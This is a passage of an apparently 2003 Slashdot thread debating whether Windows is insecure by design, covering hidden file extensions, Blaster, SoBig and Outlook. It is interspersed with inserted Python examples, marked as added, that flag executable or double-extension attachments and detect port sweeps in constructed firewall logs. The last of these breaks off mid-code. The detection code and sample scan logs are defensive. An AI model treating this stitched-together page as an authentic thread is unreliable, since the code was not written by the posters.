      Uhh, because some of us know our way around well enough to get programs from people that we want to run. Saving to HD and then running doesn't change a thing. To say you shouldn't be attaching executables is silly. People should be safe: know who sent them the mail, know what it is they are running, and run an up to date virus scanner, as well as keep their system patched.

      If you are talking about automatic running of attachments, that is a different story, but I want my computer to do what I tell it to do.

    2. Re:Correct Me If I'm Wrong but.... by Keeper · · Score: 2, Interesting

      Great. I'll let you spend the 6 months it'll take to teach my mom what an "extension" is, what it means, why she should care, and then the differences with all of the nitty gritty details (why the same files have different extensions (htm, html, shtml, etc), why pictures have different extensions (jpg, jpeg, gif, tiff, tif) and so on).

      Fact of the matter is extensions shouldn't matter -- they're just a legacy artifact of 8.3 filenames and commandline interfaces. Macs have worked just fine without them for years. Unix systems use a hodgepodge of extensions, mainly to represent what content a file contains to a person on the commandline (the same effect is derived by giving files icons in a GUI). On a Unix system I could have a file named foo.jpg -- doesn't mean it's a jpg. In fact, it could contain a binary and could be executed if the right bits were set on the file. Depending on a file extension to convey an accurate representation of its contents is just asking for trouble.

  23. Re:enough with the virus hype by craigmarshall · · Score: 2, Interesting

    I currently run Windows XP (unpatched, no virus-killer) and GNU/Linux machines behind a GNU/Linux firewall/router. I have never been *infected* with anything. If you're stupid enough to set Windows Explorer to "hide the extension of known file types", and to not know that a .scr file is just as executable as an .exe, and to not run a decent firewall then frankly, you deserve to be infected by the latest and greatest virus.

    --
    Craig
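
As an added example (not written by any poster in this thread), here is a small Python triage routine that makes the two posts above concrete: it sniffs an attachment's leading bytes, compares them with the claimed extension, flags double extensions such as photo.jpg.scr, and shows the name Explorer would display with "hide extensions for known file types" turned on. The extension and signature tables are short hand-picked sets (not Windows' full list), and the sample attachments are constructed byte strings, not real files.

```python
"""Attachment triage: compare a file's claimed extension with its content.

Added example, not from the thread. Sample attachments below are
constructed byte strings (a few header bytes plus padding), not real malware.
"""
from __future__ import annotations

from dataclasses import dataclass, field

# Extensions Windows will execute on double-click. The thread mentions
# .exe, .scr and .pif; the rest are well-known executable types.
EXECUTABLE_EXTENSIONS = {"exe", "scr", "pif", "com", "bat", "cmd", "vbs", "js"}

# "Known file types" whose extension Explorer can hide from the displayed
# name. A representative subset, not Explorer's actual registry-driven list.
KNOWN_EXTENSIONS = EXECUTABLE_EXTENSIONS | {
    "jpg", "jpeg", "gif", "png", "pdf", "zip", "txt", "doc",
}

# Leading-byte signatures -> content class (a few well-known formats only).
SIGNATURES = [
    (b"MZ", "pe-executable"),          # Windows PE / DOS stub
    (b"\x7fELF", "elf-executable"),    # Unix ELF binary
    (b"\xff\xd8\xff", "jpeg"),
    (b"\x89PNG\r\n\x1a\n", "png"),
    (b"GIF87a", "gif"),
    (b"GIF89a", "gif"),
    (b"%PDF", "pdf"),
    (b"PK\x03\x04", "zip"),
]

# Content class each data extension is expected to carry.
EXPECTED_CLASS = {
    "jpg": "jpeg", "jpeg": "jpeg", "png": "png",
    "gif": "gif", "pdf": "pdf", "zip": "zip",
}


@dataclass
class Verdict:
    filename: str
    displayed_name: str
    extension: str
    content_class: str
    flags: list[str] = field(default_factory=list)

    @property
    def suspicious(self) -> bool:
        return bool(self.flags)


def displayed_name(filename: str) -> str:
    """Name as Explorer shows it with 'hide extensions for known types' on."""
    stem, dot, ext = filename.rpartition(".")
    if dot and ext.lower() in KNOWN_EXTENSIONS:
        return stem
    return filename


def sniff(data: bytes) -> str:
    """Classify content by its leading bytes; 'unknown' if nothing matches."""
    for magic, content_class in SIGNATURES:
        if data.startswith(magic):
            return content_class
    return "unknown"


def classify_attachment(filename: str, data: bytes) -> Verdict:
    """Compare what the name claims with what the bytes say."""
    parts = filename.lower().split(".")
    ext = parts[-1] if len(parts) > 1 else ""
    content = sniff(data)
    verdict = Verdict(filename, displayed_name(filename), ext, content)

    if ext in EXECUTABLE_EXTENSIONS:
        verdict.flags.append("executable-extension")
    # foo.jpg holding a PE: the case the post above describes.
    if content.endswith("-executable") and ext not in EXECUTABLE_EXTENSIONS:
        verdict.flags.append("executable-content-with-non-executable-extension")
    if ext in EXPECTED_CLASS and content not in ("unknown", EXPECTED_CLASS[ext]):
        verdict.flags.append("extension-content-mismatch")
    # photo.jpg.scr: the visible part looks like a picture, the hidden
    # (real) extension is executable.
    if len(parts) > 2 and parts[-2] in KNOWN_EXTENSIONS and ext in EXECUTABLE_EXTENSIONS:
        verdict.flags.append("double-extension")
    return verdict


# Constructed sample attachments: header bytes plus zero padding.
SAMPLE_ATTACHMENTS = {
    "holiday.jpg": b"\xff\xd8\xff\xe0" + b"\x00" * 16,   # genuine JPEG header
    "holiday.jpg.scr": b"MZ\x90\x00" + b"\x00" * 16,     # PE behind a double extension
    "report.pdf": b"MZ\x90\x00" + b"\x00" * 16,          # PE mislabelled as PDF
    "notes.txt": b"plain text, no signature",
}


def triage(attachments: dict[str, bytes]) -> dict[str, Verdict]:
    """Run classify_attachment over a batch and key the verdicts by name."""
    return {name: classify_attachment(name, data) for name, data in attachments.items()}


if __name__ == "__main__":
    for name, verdict in triage(SAMPLE_ATTACHMENTS).items():
        shown = f"shown as '{verdict.displayed_name}'"
        print(f"{name:18} {shown:24} {verdict.content_class:15} {verdict.flags}")
```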

  24. Re:Apple and Linux systems are insecure too! by David Gerard · · Score: 3, Interesting

    And we certainly see this on the Web, where Apache on Linux greatly outnumbers Microsoft IIS on Windows. Oh wait, no we don't.

    --
    http://rocknerd.co.uk
  25. Re:Market Share? by Anonymous Coward · · Score: 2, Insightful

    It's been said already, but I'll say it again: Apache is the most used web server on the internet, yet most web server worms are for IIS. Following your logic, Apache should be exploited every couple of weeks.

  26. Re:Market Share? by Anonymous Coward · · Score: 2, Insightful

    If you read the article, the author explains why it's not just the sheer number of Windows users that's the problem. As an example, there's the number of ports open on Windows XP (5), vs. OS X (0) by default. You really do have to take into account the design of the operating system. Windows is just too easy to hack compared to the other OS choices.

    Johnny

  27. Re:Market Share? by David Gerard · · Score: 2, Insightful

    And we certainly see this on the Web, where Apache on Linux greatly outnumbers Microsoft IIS on Windows. Oh wait, no we don't!

    --
    http://rocknerd.co.uk
  28. Re:Market Share? by Homology · · Score: 3, Interesting
    If 80% of the computers on the Internet were running OS X or Linux don't you think there'd be more Mac and *nix malware?

    I find it much easier to secure a Linux/*BSD box than a Windows one. Even though I use Win 2000 daily as a programmer. I'm pretty sure I'm not alone in that predicament.

    Just keep in mind that a large part of the internet infrastructure does not run Windows, but they (the servers) still seem to do okay, apart from the odd sendmail/bind/openssh bug ;-)

  29. Re:Apple and Linux systems are insecure too! by LostCluster · · Score: 2, Insightful

    The design flaw that the author is pointing out is that administrator-only functions like RPC and the administrator's message boxes are turned on in a default installation, when the world would be better off with such features in the OS but defaulting to an off position and only running the associated software if the user indicates they want the feature on.

    This is not a design flaw that Apple and the various Linux distributors are immune from, just that they seem to violate this rule with less frequency. Let's face it, if Windows shipped with RPC turned off by default, Blaster would have a much smaller impact than it has now.

    As for SoBig, there's really nothing preventing a SoBig for Mac or Linux. After all, all you need to do is trick the user into executing a program that isn't what they think it is, and then read their address book file. The only complicating factor is that there's such an overwhelming market share for the Windows Address Book that it's the only place most virus writers bother to check for addresses to use. In order to make such a virus with the same impact on another operating system, they'd have to check the address book location of about a dozen programs... bloatware for virus writers.

  30. Re:enough with the virus hype by craigmarshall · · Score: 2, Insightful

    And in cases like these (stupiduseritis?), it doesn't matter which operating system you choose to use, you almost certainly won't have configured the machine properly from a security standpoint.

    --
    Craig

  31. Re:Why was this posted? by brokencomputer · · Score: 4, Interesting

    I agree. The Washington Post is a very well known newspaper that many people get. Even my father(who subscribes to WP) read the article this morning and showed it to me because he thought I might find it interesting. He isnt the type to read stuff like slashdot. Just a note..I saw it at news.google.com this morning.

  32. Re:It's not Windows' fault by lkaos · · Score: 4, Informative

    The recent DCE/RPC vulnerability exploited MS's DCOM implementation residing on the end point mapper port using raw DCE/RPC over TCP.

    This has nothing to do with Unix and certainly isn't a standard (hell, Samba doesn't even support this). This was totally a MS-original.

    A lot of the http virii are based on MS-extensions or broken non-standard behavior of the MS clients.

    If MS had followed what you refer to as "obscure unix standards", this wouldn't be an issue. Despite what you may think, Unix systems were designed with security in mind whereas Windows was designed as a user operating system.

    --
    int func(int a);
    func((b += 3, b));
  33. Create a Windows clone, lose a zillion dollars! by Gonoff · · Score: 2, Insightful

    If someone succeeded, MS would turn their entire corporate attention towards completely destroying them. They would (mis)use copyright, DMCA, criminal law and anything else they could get their greasy fingers into.

    One thing that has saved Linux (so far) is that they can't figure out who to aim at. All they can do is bribe lawmakers and promote FUD. They know that if they take out Redhat, someone else would have the code within seconds anyway.

    --
    I'll see your Constitution and raise you a Queen.
  34. quoth Marc Andreessen by Crashmarik · · Score: 4, Informative

    Regarding IE and Active X.

    It's nothing but a virus delivery system.

    That was about 8 years ago. Microsoft destroyed Netscape and, aside from some humorous footage of Bill Gates lying under oath, nothing was done about it.

    Now someone in the mainstream press has actually done their homework. Are we supposed to be impressed ?

  35. Bad design 4 Security - Bad 4 Servicing ... by leoaugust · · Score: 3, Interesting

    Not only are the security implications horrendous in the MS products, but servicing them is a nightmare ....

    This story just caught me at a bad time ... I have been trying to do a file/printer sharing between 2 computers running Win 2000 Prof and Win XP Prof using a hub. You would think it would be plug and play, and a little bit of configuration - and that is how I set out my cost estimates for a small business that wanted me to do it for them ... big mistake ...

    It is 3 days past now. I have read probably 100 + articles to understand the security implications for these windows products .... Used all sorts of keywords in google to get many articles to see how the damn networking is done in the first place. And I am now thoroughly confused, tired, and am spending a lot of unpaid hours getting this damn networking done. FOR GOD's sake I am trying to network two products from the same company ... How could MS screw it up and make it such a nightmare .... and do such dumb stuff as not turning the security features on by default so that I don't even know what I am exposing, all the patches that are being issued faster than I can download ...

    1. I have both the lights from the two computers in my hub flashing - thank god.
    2. I can connect via one computer to the internet - praise the lord.
    3. But I can't get the file/printer sharing done yet ... - Forgiveness is divine.
    4. And as the feed is provided by a cable internet operator, which has a pool of computers of its own, I am not even sure of what is secure and what is not - Ignorance is bliss.
    5. And I have lost a lot of money and time ... Lord, give me the strength to forgive those who do not know what they are doing ....

    --
    To see a world in a grain of sand, and then to step back and see the beach where the sand lies ...
    1. Re:Bad design 4 Security - Bad 4 Servicing ... by Politburo · · Score: 4, Funny

      Lord, give me the strength to forgive those who do not know what they are doing ....

      Can he give you the strength to forgive yourself?

  36. Running always as root.... by LostCluster · · Score: 2, Insightful

    The article takes a cheap shot implying that Windows users always run as Administrator, the Windows equivalent of the all-mighty root, while Mac and Linux users usually get this right and reserve their root use for important stuff, but spend most of their time on a limited user account.

    Microsoft had this bad in the entire Windows 9x kernel OSes because there never was any concept of a restricted user... everybody was an Admin on those boxes. Insecurity at its worst, but it was always thought of as a single-user OS, if you wanted a secure user environment you were supposed to pay for the Windows NT-based OS of the time.

    Windows XP, after all, is a Windows NT-based operating system, so half of the problem is now solved. Microsoft's consumer product finally has a restricted mode. The problem is, there's still a user problem... most people use an administrator account as their primary, sometimes only, Windows logon. So, even though the software has caught up, the users haven't.

    1. Re:Running always as root.... by Politburo · · Score: 2, Insightful

      Well, the OS software has caught up. The problem is that not all of the application software has caught up, and that is the main reason why many people (including myself) continue to run 2000/XP as administrator.

      OTOH, I always keep my (and my family's, who also run as admin) system patched, and have never had a problem with any of the MS problems talked about here. It's so painfully simple to avoid these problems that it's not even funny.

    2. Re:Running always as root.... by Sexy Commando · · Score: 2, Informative
      IMHO WindowsXXYY will never be secure until Windows introduces the concept of the sticky bit on files -- but are there patent problems with that?

      Have you ever heard of the term "NTFS"? Go to an XP machine and see how the C:\WINDOWS\Temp permission is set up. Your saying that Windows has no sticky bit-like mechanism is like saying *NIX doesn't have ACLs.

  37. Comment removed by account_deleted · · Score: 4, Insightful

    Comment removed based on user account deletion

  38. Insecure by Design by Tony-A · · Score: 2, Insightful

    I didn't have ANY trouble with SoBig.. or Blaster.. why, because I didn't patch my system. Oh a few things like clobbering Windows Scripting Host and setting things so I see the file extensions, but hardly enough to call it "secured". It's insecure. I know it's insecure.

    No one sat around a conference table in a code review and said.... you know what.. this isn't insecure.. we need to change that.
    But did anyone ever say "this isn't secure.. we need to change that."?

    In the design balance between fundamental security and "user experience", has any weight ever been given to security in the design phases? Surely Microsoft does something they call "design" for this stuff.

  39. Only Partially True by EXTomar · · Score: 3, Insightful

    While it is true that a lot of these things rely on social engineering, the other part is why does the OS allow the user to do these things in the first place? If you don't want users to do something destructive, why offer them the choice?

    One of the first rules of design seems to be lost on MS designers. If you don't want users to do something then don't offer it as an option. You can pop up dialog after dialog warning users like this:

    Do not click 'yes'. If you click 'yes' it will crash the machine. Only click 'no'.

    [Yes] [No]

    How stupid is it for a user to click "yes"? How stupid was it for the programmer to put the "yes" button there?

    Yet in MS program after MS program they tell you something is dangerous and allow you to do it anyway. I guarantee as long as applications allow this some malicious hacker will use a little word play or social engineering to allow them to do something destructive.

    I really want to throttle the person at MS who tried to get people to believe computers are as easy to operate as toaster ovens. Computers are complex machines. Hiding the fact from the user is not only dubious but dangerous.

  40. Not exactly... by Dimensio · · Score: 3, Insightful

    Apache is more deliberately used than IIS. IIS, however, has a very widespread install base amongst clueless users who don't even realise that they're running it, thanks to Microsoft's boneheaded install procedures.

  41. Best way mixed platforms for reliability .... by OldHawk777 · · Score: 2, Interesting

    I strongly advocate mixed platform networks. I consider Linux and/or BSD as the best for most backbone/critical services/systems, but MS Windows to backup the backbone/critical.
    In an office environment for the users in the past I could only advocate Apple and MS software OS+Apps. Late last year I added Linux+GNU desktop/workstation OS+Apps for a mixed platform office environment. Businesses and government should consider letting experienced users [AKA: Geeks/Gurus] select their own OS+Apps desktop.
    The reason no one ever supports the mixed network devices/switches/... (3Com, Cisco, Lucent, ...) and platform from Ma-Bell to the user is that the complexity of configuration, security, operation, ... help-desk, network/server admin ... everything would be an expensive pain to support, but (unless power-failure/outage) web/email/ftp/VoIP/VTC/ ... services from Ma-Bell to the user could be maintained during cyber-conflict activities. Someone in the office would always be able to access email, websites, ....
    For critical/emergency business/government systems and offices the complexity should be able to provide critical services for utilities, command-post, emergency agencies, .... Just a few critical (maybe one) networks and offices would require this mixed-platform configuration in business and government.
    Strict adherence to protocols, standards, and configuration would allow business and government to communicate and use www/internet/intranet services. .....DB2, My-SQL, MS-SQL, ... other considerations.
    Letting a one version OS attack (frequently MS) cripple your business, critical infrastructure systems, and/or part of a major government agency like NASA or DoD is PPP.

    --
    Unaccountable leaders are masters, and unrepresented people are slaves. How do US and EU fare?
  42. Someone Who Gets It by MBCook · · Score: 5, Insightful
    Everything I've heard on TV and Radio that's been more than just "There is a new virus" that has an attitude that I just can't stand. A thing I heard on NPR put it perfectly. Basically the attitude is that this is the way the computer industry is, and maybe they should do something about it.

    Computer industry? WHAT COMPUTER INDUSTRY? The VAST majority of these big viruses exploit whose products? All together now: MICROSOFT. This isn't Apple's fault, Macromedia's fault, iD's fault, or anyone else's. These things are almost all MICROSOFT's. Finally someone in the media seems to get it.

    --
    Comment forecast: Bits of genius surrounded by a sea of mediocrity.
    1. Re:Someone Who Gets It by phillymjs · · Score: 2, Insightful

      And if 90% of the users used Apples, 90% of the viruses would target Apples.

      Bullshit. There are about 50 Mac-specific viruses, as opposed to over 70,000 Windows viruses. Apple has ~5% marketshare, and a slightly larger installed base, yet it is targeted by only ~.07% of the known viruses. Of those 50 Mac viruses, most are either extinct or so old that they wouldn't function on versions of the Mac OS more recent than 7.6. I've been using Macs and making a living supporting them for 12 years, and I've seen exactly 2 viruses-- both non-malicious. If there's a Mac OS X-specific virus out there yet, I haven't heard of it.

      No virus or worm will ever have its way with a Mac the way Windows worms rape Windows PCs, period. All unnecessary services and ports are off by default, and if any suspect code tries any funny business, the user gets a dialog asking "Should I run this?"-- not a green light to do whatever it wants from the OS.

      If Microsoft went away tomorrow and Apple took 100% of the market, there would still be nobody writing successful Mac viruses, because the gaping security holes just aren't there to be exploited. Since OS X 10.2 came out, Apple's security update frequency is enviable-- less than once per month.

      ~Philly

  43. Re:It's not Windows' fault by Limburgher · · Score: 4, Insightful
    These are not failures of the security of the protocols. These are failures of the MS implementations of these protocols. Both IIS and Apache use http, and yet one is more secure than the other. Both Exchange/Outlook and Sendmail/(insert favorite MUA here) use smtp, and look at which one spreads virii like the clap. To blame these 'obscure' standards is like blaming the wheel for problems with Ford Explorers rolling over. It's not the standard, it's the piss-poor implementation.

    Even some Linux default installs have security holes. It's all in how it's done, not what it's done with. Are we supposed to throw out everything written in C now, too?

    --

    You are not the customer.

  44. Nice to see such a mainstream source getting on MS by thedbp · · Score: 3, Interesting

    I think my favorite part in the article is when the author suggests that MS should use their massive cash pile to mail out a CD of updates to every single customer that wants one. Considering how many CDs AOL sends out (and yes, I know they are bleeding money), wouldn't it make sense to partner with AOL, who is already producing discs, and make them multi-session, so that MS could use the already pervasive CD distribution systems in place to get updates out?
    I can't believe no one thought to suggest this before. And if MS was REALLY SERIOUS about making security their #1 priority, it would be a pittance to part with and give their customers a much-needed sense that MS actually does care about their customers.
    The question is, do they really care more about the customer or the bottom line?

  45. Re: Windows Is 'Insecure By Design,' ... by Dunark · · Score: 2, Interesting

    A lot of the recent problems could have been prevented if people had installed the available patches. However, the EULA's that one has to agree to while installing the patches are downright frightening, and Microsoft keeps making them worse.

    I wonder how many people skip the patches because the EULA's are so obnoxious?

  46. Re:Ummm... AGAIN, WHY NOT WINDOWS LINUX???? by croddy · · Score: 5, Funny

    oh yes. they could call it MSUX.

  47. Re:enough with the virus hype by thedbp · · Score: 3, Insightful

    This is really an awful way to think about a consumer base that doesn't understand some basic tenets of computing. I've known plenty of Windows users that think 3.5" floppies are hard disks because the casing is, well, hard. To expect them to catalog file extensions in their heads as well is ridiculous. Obviously you are a more savvy user as you have Linux based machines and a firewall set up.

    Not everyone has the time/expertise/desire to learn that much about computing, and that's OK. If everyone were a geek, you'd have no one to bitch about, would you?

  48. Re:Insecure by Design by Genjurosan · · Score: 2, Insightful

    But did anyone ever say "this isn't secure.. we need to change that."?

    I don't know, nor do you, or the Washington Post. That's my point. This guy is making this statement without any facts, just assumptions.

    In the design balance between fundamental security and "user experience", has any weight ever been given to security in the design phases? Surely Microsoft does something they call "design" for this stuff.

    I don't know about MS. Can you say that they don't? I for one know that my non-software company which has an IT department that watches the actions of MS a lot, has an information risk management team that looks for security holes in all in-house and purchased software before implementation. Would you care to assume that MS gives weight, or doesn't give weight to security during the design phase? Or would you care to not assume, since all the facts are not available?

  49. Re:MOD PARENT UP, more.. by SoftwareJanitor · · Score: 5, Insightful

    Where you are wrong, and the Washington Post is correct, is that Windows doesn't have to be intentionally flawed to be 'flawed by design'. Something can be flawed by design as far as security goes just in neglecting to design a proper security model to begin with. Windows is flawed because it wasn't designed to be secure from the beginning, and newer versions, even those written after Microsoft started to become more aware of the need for security, have been hamstrung by their need to retain backwards compatibility with older versions and for software written for older versions which in many cases just won't install and/or run correctly on a properly locked down installation of Windows. Whether Microsoft intentionally designed in security flaws isn't what matters; what matters is that Windows, as it is currently designed and implemented, has some inherent design flaws which make it less secure than it needs to be. Among them is the fact that so much Windows software relies on being able to write to system directories (to add DLLs, etc) to be installed, which leads most people to allow too many users to be able to access too many files. Another is the fact that Microsoft built in scripting which allows too much access to low-level functionality (in other words, it doesn't run everything in a restricted sandbox) into just about everything, including the email clients and office software most Windows users depend on. Another is the fact that executability is based on file extension and not by permissions; if it wasn't, then people wouldn't be able to accidentally execute malicious downloads so easily. This problem is compounded by the fact that by default most Windows facilities and software likes to hide the file extension.

    The Washington Post article is not a troll or flamebait, it is a very necessary wake up call to the average Joe Windows users. If more of them had patched their systems and used mail clients other than Outlook or Outlook Express as you have, then these viruses/worms wouldn't be such a big problem. Without the mainstream press letting these people know, they will not get the message.

  50. Re:Apple and Linux systems are insecure too! by OmniVector · · Score: 2, Insightful

    Actually that's incorrect. the reason most email/address book viruses spread so fast and cause so much havoc is because of Outlook and Outlook express -- which are ENTRENCHED in the business sector. I told my boss the other day that there's an email client that doesn't have these problems (Mozilla Mail) and his first question was how much does it cost to license. Managers think nothing is free, and if it is it's too good to be true -- and that, just isn't true.

    If companies made it a rule to stop using outlook/outlook express, and properly instruct people to never open email attachments from people they don't know, and file extensions that aren't safe (pif, scr, exe) then that alone would stop most viruses in their tracks. But alas, 90% of the office workforce is comprised of mindless drones who barely know how to use outlook in the first place.

    --
    - tristan
  51. Linux needed to help keep Windows secure by dwheeler · · Score: 4, Interesting
    GNU/Linux systems can be used to help Windows systems get a little more secure.

    A family member of mine got a new Windows XP system, installed it, and tried to download the security patches. Before the XP system managed to download the patches, it had already been 0wned by Blaster. It's really hard to keep a Windows system up-to-date when you can't connect to the Internet to update it.

    My solution?? I used Red Hat Linux to download the patch, and wrote it on some media. Of course, he can't really completely wipe his hard drive to be sure he's safe from any other attacks. Why? If the drive is fully wiped, Windows XP can't be installed any more - on his system, the CD doesn't contain the entire OS!

    Of course, I'm writing this from a Red Hat Linux system that has a nice built-in firewall, a "root" account that's not normally used, no externally-accessible ports, and lots of other designs that make it far more resistant to attack in the first place. Yum.

    --
    - David A. Wheeler (see my Secure Programming HOWTO)
  52. Re:If you "trademark" your mail addy... by aussersterne · · Score: 2, Insightful

    I suppose it was more a rhetorical point than a literal one. You are of course right... I am just trying to figure out how to strike a balance between limiting my exposure to liability in this networked world (because everyone is happy to sue these days) and still participating in society in normal ways.

    This balance is an increasingly difficult one to find and maintain.

    --
    STOP . AMERICA . NOW
  53. Re:I call bullshit... by Phil+John · · Score: 2, Interesting

    Yes, but you have to admit that the MSBlaster/LuvSan worm would not have been possible if RPC hadn't been disabled in an OS that doesn't require it, i.e. XP Home, or Internet Connection Firewall was on by default rather than requiring user intervention, when half the users out there don't know what a firewall is, let alone how to turn one on.

    Also, Linux users are on the most part more tech savvy than windows users, which I think plays a big part (I bet you 9 out of 10 linux users know not to open every attachment they receive).

    --
    I am NaN
  54. Re:Insecure by Design by Tony-A · · Score: 3, Informative

    Fact: File extensions are still hidden by default.

  55. Re:Apple and Linux systems are insecure too! by LostCluster · · Score: 2, Insightful

    Mozilla Mail in fact is subject to a Sobig-style attack, all that's missing is a virus that reads Mozilla's address book and goes. If your business installed Mozilla Mail, it'd still meet the mindless drones who will still open up the pif, scr, and exe attachments.
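
The point made in comments 49, 50 and 55 above (executability decided by file extension, extensions hidden by default, and the pif/scr/exe attachments that "mindless drones" will open regardless of mail client) is easiest to see as the checks a mail gateway would run on an attachment name before anyone double-clicks it. This is an added example, not code from the thread or from any product named in it; the extension lists and the verdict scheme are my own choices, and all sample names except `fkwbc34.vbs` (quoted later in the thread) are constructed.

```python
"""Attachment-name triage: executable-by-extension, double extensions, and
what the name looks like once Windows hides the 'known' extension.
Added example; the extension lists below are an assumption, not a standard."""
import os

# Extensions Windows treats as directly executable or script-launching.
EXECUTABLE_EXTS = {"exe", "pif", "scr", "com", "bat", "cmd", "vbs", "vbe",
                   "js", "jse", "wsf", "wsh", "hta", "lnk", "reg"}
# Extensions a user reads as a harmless document or picture.
LOOKS_HARMLESS = {"txt", "jpg", "jpeg", "gif", "png", "doc", "xls", "pdf",
                  "zip", "mp3", "htm", "html"}


def displayed_name(filename):
    """Name as Explorer shows it with 'Hide extensions for known file types'
    on: only the final extension disappears, so 'photo.jpg.exe' reads 'photo.jpg'."""
    root, ext = os.path.splitext(filename)
    return root if ext else filename


def assess_attachment(filename):
    """Return a verdict dict: 'block' with reasons, or 'allow' with none."""
    stripped = filename.strip()
    # Every extension after the base name, with padding spaces removed so
    # 'readme.txt      .exe' still reveals its 'txt' decoy.
    exts = [e.strip() for e in stripped.lower().split(".")[1:]]
    reasons = []
    if exts and exts[-1] in EXECUTABLE_EXTS:
        reasons.append(f"executable extension .{exts[-1]}")
        if len(exts) >= 2 and exts[-2] in LOOKS_HARMLESS:
            reasons.append(
                f"double extension: shown as '{displayed_name(stripped)}' "
                "when extensions are hidden")
        if "  " in stripped or "\t" in stripped:
            reasons.append("whitespace padding pushes the real extension out of view")
    return {
        "filename": filename,
        "displayed": displayed_name(stripped),
        "verdict": "block" if reasons else "allow",
        "reasons": reasons,
    }


def triage(filenames):
    """Map each attachment name in a message to its verdict."""
    return {name: assess_attachment(name)["verdict"] for name in filenames}


if __name__ == "__main__":
    # Constructed sample names; 'fkwbc34.vbs' is the one quoted in the thread.
    for name in ["report.pdf", "fkwbc34.vbs", "photo.jpg.exe",
                 "your_details.pif", "archive.tar.gz", "readme.txt      .exe"]:
        print(assess_attachment(name))
```

The `displayed` field is the part worth showing users: it is what they actually see on a default install, and it is why "don't open .exe files" is not advice most of them can act on.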

  56. Hard when there isn't alternatives by ducomputergeek · · Score: 2, Interesting
    I now work for a small company that sells public access kiosk systems and guess what, there is only one Linux based Kiosk system that we know of. Everything else runs on top of Win 2k or XP.

    We are switching over to the Linux based system on our "sponsored" tables, however for our pay-per-use system, we have no choice. None of the bill collectors work on the Linux version as of yet. Until then, on some of our terminals, we have no choice.

    Security is a problem, because for starters the kiosk program we have will not run on NTFS, only Fat 32, so we have to swap out hard drives with at least 1 terminal out of 10 a week and reghost it because despite blocking software, people DL things they shouldn't be.

    At work, I have a Powerbook and my boss now has a dual boot system with Windows XP pro and RH 9. He's trying to get used to Linux and Openoffice so that we can have all future employees either use Macs (for those needing photoshop/DW) and everyone can do billing and accounting from Linux terminals.

    --
    "The problem with socialism is eventually you run out of other people's money" - Thatcher.
  57. Re:Why was this posted? by Anonymous Coward · · Score: 3, Insightful

    these virii were created by people - people create virii for windows because that's what people use, not because it's more insecure than other OS's. When linux gets more popular people will start making virii for it.

  58. Re:It's not Windows' fault by owlstead · · Score: 2, Interesting

    Because this text is clearly nonsense. None of the protocols you mention have inherent security flaws. Maybe you should have noticed ftp instead, which does have some quirks.

    RPC has been targeted due to a defunct implementation on MS side, and the fact that it was open to the internet by default. This has nothing to do with security of the protocols an sich.

    To make your point completely moot: when MS does develop its own protocols (SMB, PPTP etc) they are inferior to the standardised protocols concerning security.

    One can safely say that the MS record on implementing secure protocols up till now is not that great.

    Only the XBox seems to be quite secure. Of all things, a game console is the current MS flagship :)

    Warper

  59. article bogus by felix9x · · Score: 2, Insightful

    The claim of the author is bogus.

    The author claims that windows is insecure by "Design" but he fails to talk at all about the actual design of the system. Design goes to the core of system design and I know security was definitely designed into NT from the start unlike Windows 9x.

    I don't consider buffer overflows to be particularly a design issue but generally coding faults. Every OS has had buffer overflow exploits and design can not prevent them unless automatic protection against them is designed in, which most OS's don't implement.

    The author should do a bit of research and not write fluffy articles that have no merit!!

    1. Re:article bogus by tomem · · Score: 2, Insightful

      I took "by design" as a common English usage equivalent to "intentionally". It really doesn't say anything about the OS design.

      In the article it points out that MS considered the matter and decided that the OS should be shipped "open" by default to satisfy a number of customers who expressed a preference for that.

      If these were expert customers, they should have considered the consequences of their preference being implemented for inexpert customers, who are far more numerous. It's trivial for an experienced sysadmin to open a system, but damn unlikely for a rube to care about how to close it up.

      Then there is the matter of software update notices being lost in a blizzard of other annoying notices, which makes it very unlikely that updates will actually be installed by users. That could be seen as obstruction of security "by design", in the sense you take it.

      --
      ThosEM
  60. Plug and Pray, or Plug and Pay! Security Optional by alexander.morgan · · Score: 2, Informative

    Pegoraro has a point about users not patching their systems, but unfortunately I can understand why: the updates are causing huge problems.

    On one of my desktop systems, the latest Windows XP driver updates trashed my Hercules Game Theater XP setup. Lots of error messages and no sound!

    On my Laptop, the latest Windows 2000 service pack blew away support for the Netgear MA401 WiFi card.

    The first problem is easily dealt with. Roll back the upgrade. Sound worked before and it wasn't a critical update--just recommended.

    For the laptop, I now have a choice between gaping security holes or WiFi support. Thankfully it dual boots to Linux ;)

    I wonder how many people are in the same boat. Plug and pray, or plug and pay!

  61. I've got worries anyway... by casuist99 · · Score: 2, Interesting

    I run probably the only Linux machine on a residential LAN with a shared internet gateway. Since last week sometime, the virus has so infested the XP/2000 machines on the LAN that all my upstream requests are dreadfully slow. DNS queries and HTTP GET requests, etc. Downstream transfer speeds are just fine. This is the curse of the Slammer virus - 10 to 15 port scans per second per machine on a largely M$ LAN leads to practically no internet access. The sorts of users who refuse to update their machines even weeks after a virus advisory is issued are the bane of their LAN neighbors. How can you just not care that your machine is randomly shutting down with 60-second warnings?!?!
    So, Linux helps, but only in as much as I myself cannot become infected.
    Hopefully this will post...
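
The symptom described above (a handful of infected neighbours each firing 10 to 15 probes a second until the shared gateway is useless) is easy to spot from the gateway's own firewall log, because an infected host touches many distinct destinations within a single second while a normal host touches a few. The following is an added example, not code from the thread: the log lines are constructed in netfilter/iptables style, and the ten-distinct-hosts-per-second threshold is my own choice.

```python
"""Rate-based sweep detection over gateway firewall logs: flag any LAN host
that contacts many distinct destinations within one second.
Added example; sample log is constructed, threshold is an assumption."""
import re
from collections import Counter, defaultdict


def build_sample_log():
    """Constructed sample (not from the page): one noisy host, one normal host."""
    lines = []
    for i in range(12):   # 12 distinct hosts on 135/tcp within one second
        lines.append(f"Aug 22 10:01:01 gw kernel: IN=eth1 SRC=192.168.1.23 "
                     f"DST=10.5.{i}.7 PROTO=TCP DPT=135")
    for i in range(11):   # next second: 11 distinct hosts on 1434/udp
        lines.append(f"Aug 22 10:01:02 gw kernel: IN=eth1 SRC=192.168.1.23 "
                     f"DST=10.6.{i}.9 PROTO=UDP DPT=1434")
    lines.append("Aug 22 10:01:01 gw kernel: IN=eth1 SRC=192.168.1.50 "
                 "DST=10.0.0.53 PROTO=UDP DPT=53")          # a DNS query
    lines.append("Aug 22 10:01:01 gw kernel: IN=eth1 SRC=192.168.1.50 "
                 "DST=203.0.113.10 PROTO=TCP DPT=80")       # a web request
    lines.append("this line is noise and is skipped by the parser")
    return lines


# syslog timestamp, hostname, then the netfilter key=value fields we need.
LOG_RE = re.compile(
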